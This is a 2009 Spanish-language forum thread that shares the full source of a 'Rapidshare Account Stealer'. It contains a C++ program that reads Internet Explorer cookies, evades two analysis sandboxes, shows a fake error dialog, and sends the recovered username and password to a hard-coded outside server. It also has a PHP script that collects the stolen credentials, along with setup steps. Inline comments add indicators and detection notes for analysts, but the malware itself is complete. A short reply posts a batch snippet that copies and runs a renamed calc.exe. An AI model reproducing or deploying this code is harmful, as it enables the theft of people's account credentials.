
Rapidshare account Stealer [PHP]

Publicado: 29 Abr 2009, 00:42
por Matatán
Bueno, acá se los dejo tal como lo encontré...



Rapidshare Account Stealer 2.0
Upload this php file:


Código:


<?php 
// Collection endpoint of the kit: it stores whatever arrives in the "u" and "p" query parameters.
// There is no authentication, validation or encoding of the values before they are written.
// Forensics: the values travel in the URL, so the same credentials are normally also recorded
// in the web server's access log and in any proxy log along the path.
if(isset($_GET['u']) && isset($_GET['p'])) { 
$USERNAME = $_GET['u']; 
$PASSWORD = $_GET['p']; 

// Relative path: the log is created next to this script, i.e. inside the served directory.
$FILE = "log.txt"; 
// 'at' = append, text mode. The fopen() result is not checked before it is used.
$HANDLE = fopen($FILE, 'at'); 

// One "user:password" line per request, in plaintext. On a recovered server this file is the
// artefact that lists the affected accounts.
fwrite($HANDLE, $USERNAME . ":" . $PASSWORD . "\r\n"); 
fclose($HANDLE); 
} 
?> 


MAKE SURE THE PHP FILE IS CALLED INDEX.php 

Create a txt file in the same directory called log.txt and chmod 777 it. 

Information i need: 
1 - domain name 
2 - Full path to the php file 


C++ File: 

Código: 
/* 
Rapidshare Account Stealer 2.0 
- LiQuid.Ace 

Shouts: 
- X-Zero 
- Static Ares 
- TrD 

Changes (1.0 - 2.0): 
- Removed Firefox for the time being 
- Rewrote the method of getting Username 
- Rewrote the method of getting cookie path 
- Fixed up general bugs. 
*/ 

#include <stdio.h> 
#include <shlobj.h> 

#pragma comment (lib, "WS2_32.LIB") 

// Global scratch buffers shared by the routines below. They are filled through sprintf/strcpy
// calls that carry no length argument, so nothing in this file enforces the 1024/256-byte sizes.
// szTempBuffer, szProfileini, szStrToChar and szPWBuffer are not referenced again in this listing.
char szTempBuffer[1024], szBuffer[1024], szProfileini[1024], szName[1024], szCookies[1024], szStrToChar[1024], szPWBuffer[1024]; 
// szIEID / szIEPass receive the two halves of the cookie value and are later placed in the request.
char szOldName[1024], szIEID[256], szIEPass[256]; 
int iTemp; 
// bIE is cleared by RobInternetExplorer on failure and gates the send in RunAnon.
// bVista / bXP are set by CheckOS. bFF is never read in this listing.
bool bIE = true, bFF = true, bVista = false, bXP = false; 

// Records the Windows version in the globals bVista / bXP.
// Only versions 6.0 and 5.1 are recognised; on any other version both flags stay false and
// GatherIEIntelligence then writes no cookie path at all.
void CheckOS() 
{ 
OSVERSIONINFO osvi; 

ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); 
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 

// Return value is ignored; on failure osvi keeps the zeroed version fields.
GetVersionEx(&osvi); 

// 6.0 -> treated as Vista
if(osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 0) 
{ 
bVista = true; 
} 
// 5.1 -> treated as XP
else if(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1) 
{ 
bXP = true; 
} 
} 

// Maps one hexadecimal digit character to its numeric value (0-15).
// There is no validation: any character outside '0'-'9' and 'A'-'F' falls through to the
// lowercase formula, so non-hex input produces an arbitrary value instead of an error.
int RemoveHex(char szTemp) 
{ 
return( szTemp >= '0' && szTemp <= '9' ? szTemp - '0' : szTemp >= 'A' && szTemp <= 'F' ? szTemp - 'A' + 10 : szTemp - 'a' + 10); 
} 

// Percent-decoding helper, described here as written (analysis notes, code unchanged).
//   szInput  - NUL-terminated text to scan.
//   szOutput - destination; no size is passed and no terminator is written by this function.
// Only "%XX" sequences produce output bytes. Characters outside an escape are stepped over and
// never copied, so the result holds just the decoded escape bytes of the input.
void RemoveEscape(char * szInput, char * szOutput) 
{ 
while(*szInput) 
{ 
if(*szInput == '%') 
{ 
// Both operands advance szInput inside one expression; their evaluation order is not fixed
// by the language, so which digit is treated as the high nibble depends on the compiler.
// Nothing checks that two characters actually follow the '%'.
*(szOutput++) = 16 * RemoveHex(*++szInput) + RemoveHex(*++szInput); 
} 
else 
{ 
// Advances the input only; the dereferenced value is discarded.
*szInput++; 
} 
} 
} 

// Despite its name, this stores the expanded %userprofile% path (not the account name) in the
// global szName; GatherIEIntelligence later keeps only the last path component.
void GetUsername() 
{ 
char szTemp[250]; 

// Return value (required length / failure) is not checked.
ExpandEnvironmentStrings("%userprofile%", szTemp, sizeof(szTemp)); 
sprintf(szName, "%s", szTemp); 
} 


// Builds the path of the Internet Explorer cookie file for rapidshare belonging to the current
// profile and writes it to szOutput (no size is passed; the caller supplies a 1024-byte global).
// Detection note: the two path templates below are the host-side indicators of this sample;
// a process other than the browser opening these cookie files is the behaviour to alert on.
void GatherIEIntelligence(char * szOutput) 
{ 
GetUsername(); 

// Walk backwards to the last backslash and keep what follows it (the profile folder name).
for (int i = strlen(szName) + 1; i > 0; i--) 
{ 
if( szName[i] == '\\') 
{ 
// Source and destination overlap inside szName; strcpy gives no guarantee for that case.
strcpy(szName, &szName[i + 1]); 
break; 
} 
} 

// szOldName keeps the folder name unchanged for the directory part of the path;
// szName gets every space replaced by '_' for the cookie file name.
strcpy(szOldName,szName); 
if(strstr(szName," ")) 
{ 
loop: 
int iLoc = strcspn(szName," "); 
szName[iLoc] = '_'; 
if(strstr(szName," ")) 
{ 
goto loop; 
} 
} 

// Drive letter and directory layout are hard-coded per OS flag set by CheckOS.
if(bXP) 
{ 
sprintf(szOutput, "C:\\Documents and Settings\\%s\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); 
} 
else if(bVista) 
{ 
sprintf(szOutput, "C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\%s@rapidshare[1].txt", szOldName, szName); 
} 
// Neither flag set: szOutput is left untouched.
} 

// Reads the cookie file located by GatherIEIntelligence and splits its second line at the
// first '-': the left part is copied to szUser, the right part is passed through RemoveEscape
// into szPass. Neither destination size is passed in.
// On any failure it shows a fake error dialog and clears bIE so that RunAnon sends nothing.
// Triage note: the dialog caption "ERROR 8371" is a user-visible indicator of this sample.
void RobInternetExplorer(char * szUser, char * szPass) 
{ 
GatherIEIntelligence(szCookies); 

FILE * fFP = fopen(szCookies, "r"); 
if(!fFP) 
{ 
goto FalseSwipe; 
} 

// The first line is read and then overwritten by the second read; fgets results are not checked.
// Presumably line 1 is the cookie name and line 2 its value - confirm against the file format.
fgets(szBuffer, 128, fFP); 
fgets(szBuffer, 512, fFP); 

for (iTemp = 0; iTemp < strlen(szBuffer); iTemp++) 
{ 
if(szBuffer[iTemp] == '-') 
{ 
RemoveEscape(&szBuffer[iTemp + 1], szPass); 
szBuffer[iTemp] = '\0'; 
// Up to 511 characters may be copied here; the caller in this listing passes a 256-byte buffer.
strcpy(szUser, szBuffer); 
// Returns with fFP still open; the file is never closed on any path.
return; 
} 
} 

// Reached when the file cannot be opened or the line holds no '-'.
FalseSwipe: 
MessageBox(NULL, "Windows has experienced an error and needs to close \r this program", "ERROR 8371", MB_OK); 
bIE = false; 
} 

// Anti-analysis check: returns true when a module named SbieDll.dll (the DLL that Sandboxie
// loads into sandboxed processes) is present in this process, false otherwise.
// WinMain exits without doing anything when this returns true, so a run inside that sandbox
// shows no file or network activity from this sample.
bool bSandBox() 
{ 
HMODULE hSandbox; 
hSandbox = GetModuleHandleA("SbieDll.dll"); 
if(hSandbox == 0) 
{ 
return false; 
} 
else 
{ 
return true; 
} 
} 

// Anti-analysis check keyed on the logged-on account name: returns true when it is exactly
// "USER" or "CurrentUser" (lstrcmp, case-sensitive), false otherwise or when the lookup fails.
// NOTE(review): the function name suggests these are the account names used by the Anubis
// analysis service - confirm; the code itself only shows the two string comparisons.
bool bAnubis() 
{ 
char szUser[100]; 
ZeroMemory(&szUser, sizeof(szUser)); 
DWORD dwUser = sizeof(szUser); 
if(GetUserName(szUser, &dwUser) != 0) 
{ 
if(!lstrcmp("USER", szUser) || !lstrcmp("CurrentUser", szUser)) 
{ 
return true; 
} 
} 
return false; 
} 

// Main routine: determines the OS, reads the cookie, then sends both extracted values in a
// single plain-HTTP GET request to a hard-coded server.
// Network indicators visible in this listing: destination 66.7.200.3 port 80, Host header
// anonserver.org, request path "/rapid/?u=...&p=...", and a fixed French-locale Firefox 2.0.0.3
// User-Agent / Accept header set that does not depend on the browser actually installed.
// The values are inserted without URL encoding and travel unencrypted.
void RunAnon() 
{ 
SOCKET s; 
WSADATA wsadata; 
SOCKADDR_IN target; 

CheckOS(); 
RobInternetExplorer(szIEID, szIEPass); 

// The request is formatted even when the cookie read failed; only the send below is gated on bIE.
// No length is passed, so the 1024-byte szBuffer bounds are not enforced here.
sprintf(szBuffer, "GET /rapid/?u=%s&p=%s HTTP/1.1\r\nHost: anonserver.org\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5\r\nAccept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n\r\n", szIEID, szIEPass); 

// Requests Winsock 2.2. None of the WSAStartup/socket/connect/send results are checked.
WSAStartup(0x0202, &wsadata); 

target.sin_family = AF_INET; 
target.sin_port = htons(80); 
// Literal IP address: no DNS lookup is made, so DNS logs will not show this connection.
target.sin_addr.s_addr = inet_addr("66.7.200.3"); 

s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); 
connect(s, (SOCKADDR *)&target, sizeof(target)); 

// The TCP connection is opened in every case; data is sent only if the cookie was parsed.
if(bIE) 
{ 
send(s, szBuffer, strlen(szBuffer), 0); 
} 

// The socket is closed without reading any response.
closesocket(s); 
WSACleanup(); 
} 

/*void RunClient() 
{ 
SOCKET s; 
WSADATA wsadata; 
SOCKADDR_IN target; 

CheckOS(); 
RobInternetExplorer(szIEID, szIEPass); 

sprintf(szBuffer, "GET /update/?u=%s&p=%s HTTP/1.1\r\nHost: exoevil.unreal-gaming.net\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5\r\nAccept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n\r\n", szIEID, szIEPass); 

WSAStartup(0x0202, &wsadata); 

target.sin_family = AF_INET; 
target.sin_port = htons(80); 
target.sin_addr.s_addr = inet_addr("64.18.138.163"); 

s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); 
connect(s, (SOCKADDR *)&target, sizeof(target)); 

if(bIE) 
{ 
send(s, szBuffer, strlen(szBuffer), 0); 
} 

closesocket(s); 
WSACleanup(); 
}*/ 

// Entry point of a windowless GUI-subsystem program. It exits immediately when either
// anti-analysis check matches and otherwise runs RunAnon once and returns.
// Nothing in this listing installs persistence or loops: each execution makes at most one
// cookie read and one outbound connection.
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) 
{ 
if(bSandBox()) 
{ 
return 0; 
} 
if(bAnubis()) 
{ 
return 0; 
} 
else 
{ 
RunAnon(); 
// RunClient() is the commented-out variant above that targets a different host.
// RunClient(); 
} 
return 0; 
} 


php file: 


CODE 
<?php 
// Same collection script as the one listed at the top of the post: it appends the "u" and "p"
// query parameters to log.txt as a plaintext "user:password" line, with no authentication or
// validation. The values are part of the URL, so web server access logs normally hold them too.
if(isset($_GET['u']) && isset($_GET['p'])) { 
$USERNAME = $_GET['u']; 
$PASSWORD = $_GET['p']; 

$FILE = "log.txt"; 
// Append mode; the fopen() result is used without being checked.
$HANDLE = fopen($FILE, 'at'); 

fwrite($HANDLE, $USERNAME . ":" . $PASSWORD . "\r\n"); 
fclose($HANDLE); 
} 
?>

Re: Rapidshare account Stealer

Publicado: 29 Abr 2009, 01:11
por c0nnect3d
Ponelo con la opción de code para que se vea más organizado.
Ej:


REM Illustration posted by the replier to show the forum's code formatting; it is not part of
REM the stealer above. It copies the Windows calculator to a new name under %WINDIR% and then
REM tries to start the copy.
REM Monitoring note: a renamed copy of a system binary written into %WINDIR% is a pattern that
REM file-creation and process-name checks are meant to surface.
ECHO 
COPY "%WINDIR%/SYSTEM32/CALC.EXE" "%WINDIR%/LASNENAS.EXE"
START "%WINDIR%/LASNENAS.EXE"
EXIT